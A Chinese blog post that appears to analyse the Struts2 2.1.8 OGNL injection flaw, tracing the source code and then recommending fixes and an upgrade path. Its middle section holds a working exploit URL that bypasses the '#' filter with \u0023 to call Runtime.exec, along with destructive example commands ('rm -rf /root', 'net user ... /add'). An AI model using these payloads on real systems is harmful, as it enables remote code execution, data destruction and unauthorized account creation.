前面的话

　　工作了好几点，一直都没有认认真真的去写过什么东西，趁着最近这段时间有空，总结一下这几年在工作中的一些经验，尤其是Struts2 Ognl 漏洞，当年不知道影响了多少个互联网企业。现在把他记录下来，作为对几年工作的一个回忆吧。
如果您是对Struts2不熟悉，又想测试Struts2 Ognl 漏洞的读者，请下先移步到Struts2 入门示例，里面有一个简单的Struts示例, 正好也是基于Struts2.1.8的一个示例，非常适合测试Struts2.1.8 Ognl 漏洞。

漏洞浅析

　　我们看看是那一段代码引起的这个漏洞，经过测试分析源码知道。当Struts2获取前台所传参数的内容的时候，他会先获得用户提交的参数名，然后从值栈（Value Stack）中找到符合参数值的内容，并打印。
其中ValueStack的findValue方法是关键点，我们看一下Value Stack类中定义的方法。

public interface ValueStack{public abstract String findString(String expr);public abstract String findString(String expr, boolean throwExceptionOnFailure);/*** Find a value by evaluating the given expression against the stack in the default search order.** @param expr the expression giving the path of properties to navigate to find the property value to return* @return the result of evaluating the expression*/public abstract Object findValue(String expr);public abstract Object findValue(String expr, boolean throwExceptionOnFailure);/*** Find a value by evaluating the given expression against the stack in the default search order.** @param expr   the expression giving the path of properties to navigate to find the property value to return* @param asType the type to convert the return value to* @return the result of evaluating the expression*/public abstract Object findValue(String expr, Class asType);public abstract Object findValue(String expr, Class asType,  boolean throwExceptionOnFailure);
}

　　我们可以看到findValue()有三个参数：

　　 expr 客户所传参数的表达式, 　　
asType 参数的表达式需要转换的类类型, 　　
throwExceptionOnFailure： 失败都是时候是否抛出异常

　　我们下面在看一下ValueStack类的实现类OgnlValueStack中的findValue的实现方法：

 public Object findValue(String expr, Class asType, boolean throwExceptionOnFailure) {try {if (expr == null) {return null;}if ((overrides != null) && overrides.containsKey(expr)) {expr = (String) overrides.get(expr);}// 这一步才是漏洞的关键所在Object value = ognlUtil.getValue(expr, context, root, asType);if (value != null) {return value;} else {checkForInvalidProperties(expr, throwExceptionOnFailure, throwExceptionOnFailure);return findInContext(expr);}} catch (OgnlException e) {checkForInvalidProperties(expr, throwExceptionOnFailure, throwExceptionOnFailure);return findInContext(expr);} catch (Exception e) {logLookupFailure(expr, e);if (throwExceptionOnFailure)throw new XWorkException(e);return findInContext(expr);} finally {ReflectionContextState.clear(context);}}

　　该方法中调用了

Object value = ognlUtil.getValue(expr, context, root);

　　继续深入追踪进入OgnlUtil文件，看到如下代码：

public Object getValue(String name, Map context, Object root) throws OgnlException {return Ognl.getValue(compile(name), context, root);
}

　　最后可以看到OgnlUtil类的compile, 这一步居然执行了表达式：

 public Object compile(String expression) throws OgnlException {if (enableExpressionCache) {Object o = expressions.get(expression);if (o == null) {o = Ognl.parseExpression(expression);expressions.put(expression, o);}return o;} elsereturn Ognl.parseExpression(expression);}

　　看完了源码我们知道，Ognl.getValue()方法的作用，它根据表达式（参数1），在上下文（参数2）和指定类中（参数3）查找响应的内容，并返回，若没有则返回空。在查询的过程中，表达式会被执行，这才使得攻击者有可乘之机，利用这个方法来执行一些恶意的行为。

测试漏洞

　　我们可以在浏览器中输入如下Url:http://localhost:8080/Struts2Ongl/login.action?redirect:%25{3-4}
如果浏览器上显示：http://localhost:8080/Struts2Ongl/login.action?-1 ， 则说明该Struts2版本存在ognl表达式漏洞，因为参数后面的表达式被执行了。
如果浏览器上显示：http://localhost:8080/Struts2Ongl/login.action?redirect:%25{3-4}，则说明该Struts2版本不存在ognl表达式漏洞，它没有执行参数后面的表达式。

Struts2的核心是使用的webwork框架，处理 action时通过调用底层的getter/setter方法来处理http的参数，它将每个http参数声明为一个ONGL（这里是ONGL的介绍）语句。当我们提交一个http参数：
?user.address.city=Bishkek&user[‘favoriteDrink’]=kumys

ONGL将它转换为（如下java代码）：
action.getUser().getAddress().setCity(“Bishkek”) ；
action.getUser().setFavoriteDrink(“kumys”) ；

这是通过ParametersInterceptor（参数过滤器）来执行的，使用用户提供的HTTP参数调用 ValueStack.setValue()。
为了防范篡改服务器端对象，XWork的ParametersInterceptor不允许参数名中出现“#”字符，但如果使用了Java的 unicode字符串表示\u0023，攻击者就可以绕过保护。
以下Url请求代码有破坏性，请在测试环境执行，严禁用此种方法进行恶意攻击。

http://localhost:8080/Struts2Ongl/login.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(a)=true
&(b)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023zzz')
(\u0023zzz\u003dnew%20java.lang.Boolean("false")))
&(c)(@java.lang.Runtime@getRuntime().exec("calc"))

　　转义后Url如下：

http://localhost:8080/Struts2Ongl/login.action?('#_memberAccess['allowStaticMethodAccess']')(a)=true
&(b)(('#context['xwork.MethodAccessor.denyMethodExecution']=#zzz')
(#zzz=new%20java.lang.Boolean("false")))
&(c)(('#rt.exec("calc")')(#rt=@java.lang.Runtime@getRuntime()))=1  

　　OGNL处理时最终的结果就是执行一下代码:

java.lang.Runtime.getRuntime().exec("calc");  

　　在windows下的演示效果便是弹出了计算器

　　类似的可以执行如下代码：

java.lang.Runtime.getRuntime().exec("rm –rf /root")  
，只要有权限就可以删除任何一个目录。 
java.lang.Runtime.getRuntime().exec("net user 用户名 密码 /add");//增加操作系统用户，在有权限的情况下能成功（在URL中用%20替换空格，%2F替换/）

　　后果是相当可怕

解决方案

　　大概有四种解决方案，方案如下。建议使用第四中方案。
1.升级到struts2.2版本。
这个可以避免这个问题，经测试发现新版本虽然解决了上述的漏洞，但是新的问题是strus标签出问题了。

<s:bean id="Test" name="cn.com.Test"></s:bean>   
<s:property value="#Test.getType().get(cType.toString())" /> 

　　这样的标签在struts2.0中是可以使用的，但是新版中就不解析了，原因就是“#”的问题导致的，补了漏洞，正常的使用也用不了了。
所以sebug网站上的建议升级到2.2版本是不可行的。

　　2.struts参数过滤。

<interceptor-ref name="params">   
<param name="excludeParams">.*\\u0023.*</param>   
</interceptor-ref>  

　　这个可以解决漏洞问题，缺点是工作量大，每个项目都得改struts配置文件。如果项目里，是引用的一个类似global.xml的配置文件，工作量相应减少一些。

　　3.在前端请求进行过滤。
比如在ngnix，apache进行拦截，参数中带有\u0023的一律视为攻击，跳转到404页面或者别的什么页面。这样做的一个前提就是没人把#号转码后作为参数传递。
请求如果是get方式，可以进行过滤，如果是post方式就过滤不到了，所以还是应该修改配置文件或更新新的jar包。

4、全面升级。struts2.1.8.1升级至2.3.24 　

• 1、新增JAR包：commons-lang3-3.2.jar 和 javassist-3.11.0.GA.jar
• 2、替换JAR包：
  commons-fileupload-1.2.1.jar —->commons-fileupload-1.3.1.jar
  commons-io-1.3.2.jar —–>commons-io-2.2.jar
  freemarker-2.3.15.jar —->freemarker-2.3.22.jar
  ognl-2.7.3.jar —-> ognl-3.0.6.jar
  struts2-core-2.1.8.1.jar —-> struts2-core-2.3.24.jar
  xwork-core-2.1.6.jar —–> xwork-core-2.3.24.jar
• 3、保留原有的commons-lang.jar，org.apache.commons.lang.StringUtils类被org.apache.commons.lang3.StringUtils替换了
• 4、修改web.xml, 将org.apache.struts2.dispatcher.FilterDispatcher 改为 org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter